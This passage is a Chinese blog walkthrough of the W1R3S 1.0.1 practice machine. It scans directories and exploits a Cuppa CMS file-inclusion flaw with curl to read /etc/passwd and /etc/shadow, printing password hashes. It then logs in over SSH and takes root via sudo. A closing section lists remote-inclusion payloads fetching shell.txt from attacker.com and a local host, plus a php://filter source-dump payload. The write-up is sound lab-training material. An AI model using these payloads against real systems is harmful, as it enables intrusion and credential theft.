<p>** <strong><strong>Apache2 在 Ubuntu 上的默认欢迎页面</strong>，说明这个网站**刚刚安装完 Apache</strong>，还没<strong>替换或删除</strong>这个默认文件</p>
<p><strong>查看源码</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452028.png" alt="image-20260304183857770"></p>
<p><strong>没有什么有用信息。（如用户名，密码，目录…）</strong></p>
<p><strong>而且该网页也没有图片之类的可以下载下来进行图片分析</strong></p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>**下一步，必须也是非常重要的一步，**<strong>目录扫描</strong></p>
<p><strong>工具 dirb (自带)</strong>	<strong>gobuster(需下载)</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install gobuster</span><br></pre></td></tr></table></figure>

<blockquote>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452030.png" alt="image-20260304190948915"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452031.png" alt="image-20260304185751281"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452032.png" alt="image-20260304185810798"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452033.png" alt="image-20260304190934264"></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452034.png" alt="image-20260304185832039"></p>
</blockquote>
<p><strong>dirb</strong> 进行目录扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo dirb 192.168.168.138:80/</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452035.png" alt="image-20260304193117808"></p>
<p><strong>可以看到 dirb 默认可以扫描****多级目录</strong>，更为详细</p>
<p><strong>gobuster</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452036.png" alt="image-20260304193353477"></p>
<p><strong>扫描结果更清晰简洁</strong></p>
<p><strong>由此，我们得到三个目录</strong></p>
<h3 id="目录分析"><a href="#目录分析" class="headerlink" title="目录分析"></a>目录分析</h3><p><a target="_blank" rel="noopener" href="http://192.168.168.138/javascript/">http://192.168.168.138/javascript/</a></p>
<p><strong>不允许访问，只能了解是 apache 跑的 Ubuntu 系统</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452037.png" alt="image-20260304193732063"></p>
<p><a target="_blank" rel="noopener" href="http://192.168.168.138/wordpress/">http://192.168.168.138/wordpress/</a></p>
<p><strong>访问 wordpress 发现跳转到 localhost&#x2F;wordpress，且无法访问页面，了解不到对应的版本，无法进行利用</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452038.png" alt="image-20260304193845770"></p>
<p><strong>访问扫描出的 wordpres 默认登录&#x2F;内容…页面也没有反应</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452039.png" alt="image-20260304194233291"></p>
<p><a target="_blank" rel="noopener" href="http://192.168.168.138/administrator/">http://192.168.168.138/administrator/</a></p>
<p><strong>访问 administrator，可以访问，看到是一个程序的安装，页面可交互的地方只有****Next</strong>，而且页面源码也没有有用信息</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452040.png" alt="image-20260304193620991"></p>
<p><strong>但是！页面****标题显示 cappa CMS</strong>，说明这也是一个内容管理系统 <img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452041.png" alt="image-20260304194622153"></p>
<h3 id="cappa-CMS-分析"><a href="#cappa-CMS-分析" class="headerlink" title="cappa CMS 分析"></a>cappa CMS 分析</h3><blockquote>
<p><strong>[!NOTE]</strong></p>
<p><strong>接下来我们有****两条路</strong></p>
<p><strong>一条</strong>是点 Next，看看能否获得登录或注册口，或者是其他可利用信息</p>
<p><strong>另一条</strong>是查询 cappa CMS 的公开利用漏洞</p>
</blockquote>
<h4 id="点-Nex"><a href="#点-Nex" class="headerlink" title="点 Nex"></a>点 Nex</h4><p><strong>注意这是靶机的渗透测试，虽然不是实际情况，但也要想到！</strong></p>
<p><strong>因为是安装，点了 NEXT 会不会对原机器有什么改变，会不会被管理员发现之类？造成系统重启？…</strong></p>
<p><strong>就算真有也要点，因为走到这里了，方法穷尽。就算之后****不可控也要想到，有预期的</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452042.png" alt="image-20260304200028695"></p>
<p><strong>进去以后是配置页，数据库和管理员信息。[?]可以看 default 默认信息 。可以填着试试</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452043.png" alt="image-20251022194837812"></p>
<p><strong>可是安装了但也进不去，交互的按钮只有 back</strong></p>
<p><strong>走不下去了</strong></p>
<p><strong>看源码，没有泄漏 CMS 的版本，敏感信息…</strong></p>
<h4 id="查公开漏洞"><a href="#查公开漏洞" class="headerlink" title="查公开漏洞"></a>查公开漏洞</h4><p><strong>作为一个大的内容管理系统，思考有没有什么公开漏洞</strong></p>
<p><strong>工具：</strong><code>searchsploit</code> kali 自带</p>
<blockquote>
<p><strong>SearchSploit 为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接，这些文件不包含在标准存储库中，但可以在我们的 Exploit-DB 二进制文件中找到。</strong></p>
<p><strong>也就是里面包含了下面这个网页中的所有公开漏洞</strong></p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/">Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers</a></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452044.png" alt="image-20260304200819818"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit cuppa cms          </span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452045.png" alt="image-20260304201008029"></p>
<p>** 发现只有一条数据（几条无所谓，只影响筛查难度）**		<strong>ps：可以查一下 wordpress 的，具体情况要带上版本</strong></p>
<p><strong>然后下载该利用文件</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">searchsploit cuppa -m 25971</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452046.png" alt="image-20260304201422657"></p>
<p><strong>发现是****文件包含类型的漏洞</strong>，下面是漏洞所在目录和位置</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452047.png" alt="image-20260304201548959"></p>
<p><strong>漏洞描述</strong>：攻击者可能利用此漏洞包含本地或远程的 PHP 文件，或读取非 PHP 文件。在创建将被包含到当前文件中的文件名时，使用了受污染的用户数据。该文件中的 PHP 代码将被执行，非 PHP 代码则会被嵌入到输出内容中。此漏洞可能导致服务器完全沦陷。</p>
<p><strong>攻击方式</strong>：有远程文件包含和本地文件包含（或者说任意文件的读取），               还可以通过 php 的字节流访问 php 的源码</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452048.png" alt="image-20260304201729643"></p>
<p><strong>最简单最方便的肯定是本地文件包含</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.168.138/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452049.png" alt="image-20260304203057990"></p>
<p><strong>发现 NOT FOUND 难道是 poc 有问题吗？？？</strong></p>
<p><strong>并不是，回过头去看我们目录扫描结果可知，我们一共扫出来三个目录，而上面的目录为</strong><strong>&#x2F;cuppa</strong> 就是错误原因！</p>
<p><a target="_blank" rel="noopener" href="http://192.168.168.138/javascript/">http://192.168.168.138/javascript/</a></p>
<p><a target="_blank" rel="noopener" href="http://192.168.168.138/wordpress/">http://192.168.168.138/wordpress/</a></p>
<p><a target="_blank" rel="noopener" href="http://192.168.168.138/administrator/">http://192.168.168.138/administrator/</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.168.138/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452050.png" alt="image-20260304203411049"></p>
<p><strong>发现没报错，也没有可见结果。检查源代码也没有我们想见的 passwd 信息，这又该怎么办？</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452051.png" alt="image-20260304203511393"></p>
<p><strong>分析：”urlConfig”是作为一个参数给过来的，一般来说，作为参数是用 get 方式来处理数据的，但不一定。有没有可能是 post</strong></p>
<p><strong>而漏洞利用里面有使用 base64 编码的内容</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452052.png" alt="image-20251022200958080"></p>
<p><strong>可以猜测是 post，要不你也可以下载漏洞利用里面给的第三方源码进行代码审计或者自己****去网上搜 cuppaCMS 的源码然后代码审计</strong></p>
<p><strong>我们在之前确定了漏洞位置，22 行</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452053.png" alt="image-20251022201350355"></p>
<p><a target="_blank" rel="noopener" href="https://github.com/CuppaCMS/CuppaCMS/blob/master/alerts/alertConfigField.php">CuppaCMS&#x2F;alerts&#x2F;alertConfigField.php at master · CuppaCMS&#x2F;CuppaCMS · GitHub</a>                 <strong>源码地址</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452054.png" alt="image-20260304204430237"></p>
<p><strong>可以看到关键词搜索，确实是 POST 不做任何处理来处理数据的</strong></p>
<p>**还是多种方法，**<strong>burpsuit 抓包，hackerbar，也可以用命令行工具 curl</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452055.png" alt="image-20251022201844385"></p>
<p><strong>这里用</strong><code>curl</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --help all | grep url                  #搜索curl中的有关url的帮助，不加grep太多了</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452056.png" alt="image-20260304204939646"></p>
<p><strong>发现第一个与 URL 的 POST 相关。</strong></p>
<p><strong>其实跟 hackerbar 很类似</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --data-urlencode &quot;urlConfig=../../../../../../../../../etc/passwd&quot; http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452057.png" alt="image-20260304205352842"></p>
<p><strong>利用成功</strong></p>
<p><strong>接下来看看能否读取最重要的****shadow</strong> 文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --data-urlencode &quot;urlConfig=../../../../../../../../../etc/shadow&quot; http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452058.png" alt="image-20260304205609750"><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452059.png" alt="image-20260304205556067"></p>
<p><strong>成功读取 root，www-data，w1r3s 三个账户的密码 hash 值</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0</span><br><span class="line">www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1</span><br><span class="line">w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::</span><br><span class="line">www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::</span><br><span class="line">w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::</span><br></pre></td></tr></table></figure>

<p><strong>比较慢，可以多试几次</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452060.png" alt="image-20260304210436082"></p>
<h2 id="获得初始-shell"><a href="#获得初始-shell" class="headerlink" title="获得初始 shell"></a>获得初始 shell</h2><p><strong>我们现在相当于有了用户名和密码，如何登录呢？</strong></p>
<p><strong>我们想到，nmap 扫描时 22 端口 ssh 是开放的，尝试连接靶机</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ssh w1r3s@192.168.168.138              密码是 computer</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452061.png" alt="image-20260304211135629"></p>
<p><strong>ssh 连接成功</strong></p>
<p><strong>查看该用户信息，确认是靶机没错</strong></p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452062.png" alt="image-20260304211254213"></p>
<p><strong>查看 id 信息，发现有居然有****sudo</strong>			<strong>查看当前用户权限 <strong><code>sudo -l</code> 居然</strong>全是 ALL</strong>! 也就是说该用户<strong>具有管理员的所有权限</strong></p>
<p><strong>运气很好，省去了****提权</strong>步骤</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452063.png" alt="image-20260304211445971"></p>
<p><strong>找找</strong><code>flag</code></p>
<p><strong>先切换到 root 用户</strong>	<code>sudo /bin/bash</code>	<strong># 这个命令用于****以 root 权限启动一个新的 Bash shell</strong>。</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131452064.png" alt="image-20260304212028853"></p>
<p><strong>找找有没有</strong><code>flag</code>（不是所有靶机都有的，但共同目标都是获取其最高权限，即 roo 权限）</p>
<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131357141.png" alt="image-20260304212221490"></p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.168.138/administrator/alerts/alertConfigField.php?urlConfig=http://192.168.168.130/phpinfo.txt?</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131355467.png" alt="image-20260304213613547"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">curl --data-urlencode &quot;urlConfig=http://192.168.168.130/phpinfo.txt&quot; http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br><span class="line"></span><br><span class="line">curl -X POST \</span><br><span class="line">     -d &quot;urlConfig=http://attacker.com/shell.txt&quot; \</span><br><span class="line">     http://target/cuppa/alerts/alertConfigField.php</span><br><span class="line">curl -X POST \</span><br><span class="line">     -d &quot;urlConfig=http://192.168.168.130/shell.txt?&amp;test=hello&quot; \</span><br><span class="line">     http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl --data-urlencode &quot;urlConfig=../../../../../../../../../etc/passwd&quot; http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131352771.png" alt="image-20260304201729643"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.168.138/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">curl --data-urlencode &quot;urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php&quot; http://192.168.168.138/administrator/alerts/alertConfigField.php</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/lmlsamas/picgo/raw/master/20260313131346507.png" alt="image-20260304221109099"></p>
<p><strong>文件确实被包含了，但 curl post 不显示结果，不知道为什么</strong></p>

    </article>
    
    <div class="read-nums">
      <!-- id 将作为查询条件 -->
      <span id="2026/03/13/W1R3S/" class="leancloud_visitors" data-flag-title="Your Article Title">
        <em class="post-meta-item-text">浏览量</em>
        <i class="leancloud-visitors-count"></i>
      </span>
    </div>
    <div class="comments-intro">
      <h2>评论区</h2>
      <p>欢迎你留下宝贵的意见，昵称输入QQ号会显示QQ头像哦~</p>
    </div>
    <div id="vcomments" class="vcomments"></div>
    
  </div>
  <div class="article-catelogue">
    <div class="article-catelogue--wrapper">
      <div class="catelogue catelogue-1">
        <h3>目录</h3>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#W1R3S-1-0-1"><span class="toc-number">1.</span> <span class="toc-text">W1R3S 1.0.1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9D%B6%E6%9C%BA%E4%B8%8B%E8%BD%BD"><span class="toc-number">1.0.1.</span> <span class="toc-text">靶机下载</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%EF%BC%8Cnmap-%E6%89%AB%E6%8F%8F%E4%B8%8E%E5%88%86%E6%9E%90"><span class="toc-number">1.1.</span> <span class="toc-text">一，nmap 扫描与分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%9A%90%E8%94%BD%E6%80%A7%E5%8E%9F%E5%88%99"><span class="toc-number">1.1.1.</span> <span class="toc-text">隐蔽性原则</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%8E%A2%E6%B5%8B%E5%AD%98%E6%B4%BB%E4%B8%BB%E6%9C%BA"><span class="toc-number">1.1.2.</span> <span class="toc-text">1.探测存活主机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%EF%BC%88%E5%8F%91%E7%8E%B0%E5%93%AA%E4%BA%9B%E7%AB%AF%E5%8F%A3%E6%98%AF%E5%BC%80%E6%94%BE%E7%9A%84-%E9%BB%98%E8%AE%A4-TCP%EF%BC%89"><span class="toc-number">1.1.3.</span> <span class="toc-text">2 端口扫描（发现哪些端口是开放的&#x2F;默认 TCP）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-UDP-%E6%89%AB%E6%8F%8F"><span class="toc-number">1.1.4.</span> <span class="toc-text">3,UDP 扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E8%AF%A6%E7%BB%86%E4%BF%A1%E6%81%AF%E6%89%AB%E6%8F%8F%EF%BC%88%E9%87%8D%E4%B8%AD%E4%B9%8B%E9%87%8D%EF%BC%89"><span class="toc-number">1.1.5.</span> <span class="toc-text">4,详细信息扫描（重中之重）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E6%BC%8F%E6%B4%9E%E8%84%9A%E6%9C%AC%E7%9A%84%E6%89%AB%E6%8F%8F%EF%BC%88%E5%85%AD%E5%88%86%E9%92%9F%E5%B7%A6%E5%8F%B3%EF%BC%89"><span class="toc-number">1.1.6.</span> <span class="toc-text">5.漏洞脚本的扫描（六分钟左右）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E5%BA%94%E7%94%A8%EF%BC%88%E5%89%8D%E5%8F%B0%EF%BC%89"><span class="toc-number">1.1.7.</span> <span class="toc-text">1. 内容管理应用（前台）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%86%85%E5%AE%B9%E7%AE%A1%E7%90%86%E5%BA%94%E7%94%A8%EF%BC%88%E5%90%8E%E5%8F%B0%EF%BC%89"><span class="toc-number">1.1.8.</span> <span class="toc-text">2. 内容管理应用（后台）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-number">1.1.9.</span> <span class="toc-text">3. 数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E8%80%85%EF%BC%9A%E6%94%BB%E5%87%BB%E9%9D%A2%E5%B9%BF"><span class="toc-number">1.1.10.</span> <span class="toc-text">对渗透测试者：攻击面广</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-IPv6-%E6%89%AB%E6%8F%8F"><span class="toc-number">1.1.11.</span> <span class="toc-text">6.IPv6 扫描</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#IOXIDResolver-%E5%B7%A5%E5%85%B7%EF%BC%9A%E5%8F%91%E7%8E%B0%E8%AF%A5-IPv4-%E7%9A%84%E7%BD%91%E5%8D%A1%E6%9C%89%E6%B2%A1%E6%9C%89-IPv6-%E5%BC%80%E6%94%BE"><span class="toc-number">1.1.11.0.1.</span> <span class="toc-text">IOXIDResolver 工具：发现该 IPv4 的网卡有没有 IPv6 开放</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%EF%BC%8CFTP-%E6%B8%97%E9%80%8F%E2%80%93%E5%8C%BF%E5%90%8D%E7%99%BB%E9%99%86"><span class="toc-number">1.2.</span> <span class="toc-text">二，FTP 渗透–匿名登陆</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-ftp-%E8%BF%9E%E6%8E%A5%E9%9D%B6%E6%9C%BA"><span class="toc-number">1.2.1.</span> <span class="toc-text">1.ftp 连接靶机</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%8F%91%E7%8E%B0%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%E6%96%87%E4%BB%B6%E5%B9%B6%E5%85%A8%E9%83%A8%E4%B8%8B%E8%BD%BD"><span class="toc-number">1.2.2.</span> <span class="toc-text">2.发现目录下的文件并全部下载</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E6%9F%A5%E7%9C%8B%E5%90%84%E4%B8%AA%E6%96%87%E4%BB%B6%E7%9A%84%E5%86%85%E5%AE%B9%E8%BF%9B%E8%A1%8C%E9%80%90%E4%B8%AA%E5%88%86%E6%9E%90"><span class="toc-number">1.2.3.</span> <span class="toc-text">3.查看各个文件的内容进行逐个分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%EF%BC%8C%E7%9C%8B%E4%B8%80%E4%B8%8B-3306-MySQL"><span class="toc-number">1.3.</span> <span class="toc-text">三，看一下 3306 MySQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B%EF%BC%8Cweb-%E6%B8%97%E9%80%8F"><span class="toc-number">1.4.</span> <span class="toc-text">四，web 渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#80-%E7%AB%AF%E5%8F%A3"><span class="toc-number">1.4.1.</span> <span class="toc-text">80 端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">1.4.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E5%88%86%E6%9E%90"><span class="toc-number">1.4.3.</span> <span class="toc-text">目录分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cappa-CMS-%E5%88%86%E6%9E%90"><span class="toc-number">1.4.4.</span> <span class="toc-text">cappa CMS 分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%82%B9-Nex"><span class="toc-number">1.4.4.1.</span> <span class="toc-text">点 Nex</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9F%A5%E5%85%AC%E5%BC%80%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.4.2.</span> <span class="toc-text">查公开漏洞</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%BE%97%E5%88%9D%E5%A7%8B-shell"><span class="toc-number">1.5.</span> <span class="toc-text">获得初始 shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96"><span class="toc-number">1.6.</span> <span class="toc-text">其他</span></a></li></ol></li></ol>
      </div>
      
        <div class="catelogue catelogue-2">
          
            <p>
              <span>上一篇：</span>
              <a href="/2026/03/13/W1R3S-github图床 (restored 1773387147466)/">W1R3S-github图床 (restored 1773387147466)</a>
            </p>
           
          
            <p>
              <span>下一篇</span>
              <a href="/2026/03/13/hello-world/">Hello World</a>
            </p>
          
        </div>
      
    </div>
  </div>
</div>


<script>
  // var定义，避免pjax重新进来造成的重复声明错误
  var config = JSON.parse('{"enable":true,"appId":"Pf8zCXGEH1qsprnWfikVVujL-gzGzoHsz","appKey":"qOqoiUHhH1TGtLRUYURkLRQX","placeholder":"请留下你宝贵的意见吧~","meta":["nick"],"recordIP":true,"visitor":true,"enableQQ":true}')
  new Valine({
    el: '#vcomments',
    appId: config.appId,
    appKey: config.appKey,
    placeholder: config.placeholder,
    meta: config.meta,
    recordIP: config.recordIP,
    visitor: config.visitor,
    enableQQ: config.enableQQ,
    path: '2026/03/13/W1R3S/'
  })
</script>


<script>
  $(document).on('pjax:complete', function() {
    const tocs = document.querySelector('.toc')
    const links = tocs ? tocs.querySelectorAll('a') : []
    links.forEach(link => {
      link.addEventListener('click', e => {
        const href = decodeURIComponent(e.href)
        href.search(/#(.*)/)
        const id = RegExp.$1
        const target = document.querySelector('#' + id)
        const top = target.offsetTop
        document.documentElement.scrollTo({
          top: top - 100,
          behavior: 'smooth'
        })
        e.preventDefault()
      })
    })
  })
</script> 

</div>
      <div class="main-right-wrapper"><div class="main-right">
  <div class="main-right--board">
    <div class="main-right--title">
      <h5>公告栏</h5>
      <i class="iconfont icon-gonggao"></i>
    </div>
    <div class="main-right--content">
      Hello\\x7e欢迎你们来到博客小站，希望能在这里收获到有用的东西哦！ 
    </div>
  </div>

  <div id="aplayer" class="main-right--music"></div>

  <div class="operate-items">
    <div class="operate-item backtop">
      <i class="iconfont icon-huidaodingbu"></i>
      <span>回到顶部</span>
    </div>
    
    <div class="operate-item turn-comment hidden">
      <i class="iconfont icon-pinglun"></i>
      <span>查看评论</span>
    </div>
    
  </div>

  <div class="main-right--site">
    <div class="main-right--power">
      <p>Power By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a>.</p>
      <p>Theme：<a target="_blank" rel="noopener" href="https://github.com/Aizener/hexo-theme-cola">Cola.</a></p>
    </div>
    <p class="main-right--refer"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">...</a> </p>
  </div>
</div>

<script>
  function setOperateItem () {
    const reg = /\d{4}\/\d{2}\/\d{2}\/.+/
    const path = location.pathname
    const operateDom = document.querySelector('.main-right .operate-items')
    const commentDom = document.querySelector('.turn-comment')
    const cateloguDom = document.querySelector('.article-catelogue > .article-catelogue--wrapper');

    if (commentDom) {
      if (reg.test(path) || path.match(/\/log\/.+/)) {
        commentDom.classList.remove('hidden')
        const newDom = operateDom.cloneNode(true);
        const _backtopDom = newDom.querySelector('.backtop');
        const _commentDom = newDom.querySelector('.turn-comment');
        _backtopDom.addEventListener('click', () => backTopEvent());
        _commentDom.addEventListener('click', () => commentDomEvent());
        cateloguDom.appendChild(newDom);
      } else {
        commentDom.classList.add('hidden')
      }
    }
  }

  setOperateItem()
